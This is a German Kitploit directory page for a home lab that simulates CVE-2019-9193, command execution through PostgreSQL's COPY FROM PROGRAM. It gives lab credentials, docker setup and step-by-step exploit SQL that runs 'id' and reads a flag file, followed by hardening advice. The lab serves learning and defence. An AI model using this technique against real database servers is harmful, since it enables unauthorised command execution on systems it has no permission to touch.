Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9193-Home-Lab — Dieses Labor simuliert CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE | Kitploit
Tools/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungDatenbanksicherheitLabs & Praxis
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

Dieses Labor simuliert CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE

Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ENGLISCHE VERSION

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

Dieses Labor simuliert CVE-2019-9193, eine Schwachstelle in PostgreSQL 9.3–11.2, die folgendes ermöglicht:

root@kitploit:~
COPY ... FROM PROGRAM '<Befehl>'

zur Ausführung von OS-Befehlen durch einen Superuser oder eine Rolle mit pg_execute_server_program.

Ihre Aufgabe ist es, diese Funktion auszunutzen, um folgende Datei zu lesen:

root@kitploit:~
/tmp/flag.txt

Ziel

  1. Verbinden Sie sich mit PostgreSQL:
    • Benutzer: postgres
    • Passwort: sentinel7
    • Host-Port: 5433
  2. Verwenden Sie COPY FROM PROGRAM, um:
    • OS-Befehle auszuführen
    • die Flagge abzurufen

Erste Schritte

root@kitploit:~
docker compose build
docker compose up -d

Verbinden Sie sich via:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

Ausnutzung

1) Tabelle erstellen

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) RCE testen

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) Flag lesen

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

Sicherheitshinweise

  • Führen Sie Anwendungen niemals mit dem PostgreSQL-Superuser aus
  • Gewähren Sie pg_execute_server_program nicht unnötig
  • Deaktivieren oder beschränken Sie COPY PROGRAM
  • Härten Sie Anwendungen gegen SQL-Injection

Tool herunterladen